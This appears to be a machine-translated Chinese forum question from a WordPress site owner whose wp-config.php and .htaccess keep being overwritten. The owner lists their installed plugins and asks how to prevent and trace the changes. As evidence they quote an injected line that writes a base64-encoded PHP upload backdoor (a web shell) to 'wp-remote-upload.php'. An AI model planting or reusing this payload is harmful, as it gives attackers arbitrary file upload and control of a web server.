我有一个WordPress网站（v5.2.3），并且偶尔（可能每月）有wp-config.php 和.htaccess 文件被错误信息覆盖。

这会导致两个问题-首先是数据库访问详细信息wp-config 更改为不起作用的内容，然后由于信息丢失，访问我的帖子链接永久链接的能力将丢失htaccess.

被覆盖后，我的wp-config 文件中充满了这样的行：

file_put_contents("wp-remote-upload.php", base64_decode(\'PD9waHANCmVjaG8gIlRoaXMgc2hpdCB3b3JrcyEiOw0KaWYgKGlzc2V0KCRfRklMRVNbImZpbGVuYW1lIl0pKQ0Kew0KICAgaWYoJF9GSUxFU1siZmlsZW5hbWUiXVsic2l6ZSJdID4gMTAyNCozKjEwMjQpDQogICB7DQogICAgIGVjaG8gKCJGaWxlIHRvbyBsYXJnZSAobW9yZSB0aGFuIDNNYikiKTsNCiAgICAgZXhpdDsNCiAgIH0NCiAgIGlmKGlzX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1siZmlsZW5hbWUiXVsidG1wX25hbWUiXSkpDQogICB7DQogICAgIG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWyJmaWxlbmFtZSJdWyJ0bXBfbmFtZSJdLCAkX0ZJTEVTWyJmaWxlbmFtZSJdWyJuYW1lIl0pOw0KCSBlY2hvICgiPGJyPkRvbmUhPGJyPiIpOw0KICAgfSBlbHNlIHsNCiAgICAgIGVjaG8oIjxicj5FcnJvciEgIi4kcGhwX2Vycm9ybXNnLiI8YnI+Iik7DQogICB9DQp9DQo/Pg==\'));

我的wp-config 文件中有这么多这样的行，大小约为800Kb。

我在WordPress网站上使用的插件如下：

Akismet Anti-Spam[由Automatic提供的第4.0.1版]

联系表单7[由Takayuki Miyoshi提供的第4.9.2版]

复制器[由Snap Creek提供的第1.2.3版]

Google Analytics for WordPress[由MonsterInsights提供的第7.1版]

你好Dolly[由Matt Mullenweg提供的第1.6版]

限制登录尝试[由Johan Eenfeldt提供的第1.7.1版]

徽标[由Slider提供的第1.4.7版EnigmaWeb]

最近发布小部件扩展【Satrya编写的v0.9.9.7】

静噪选项卡和手风琴短代码【Matt Lowe编写的v0.4.1】

WordPress导入程序【wordpressdotorg编写的v0.6.3】

Yoast SEO【Yoast团队编写的v5.9.1】

使用我的FTP程序，我尝试将权限更改为wp-config.php 和.htaccess 文件，使其无法写入-但是，我尝试更改这些值，但没有导致任何更改。我假设我没有能力更改文件权限。

如何防止这些文件被过度写入？

或者，我如何发现更改这些文件的原因？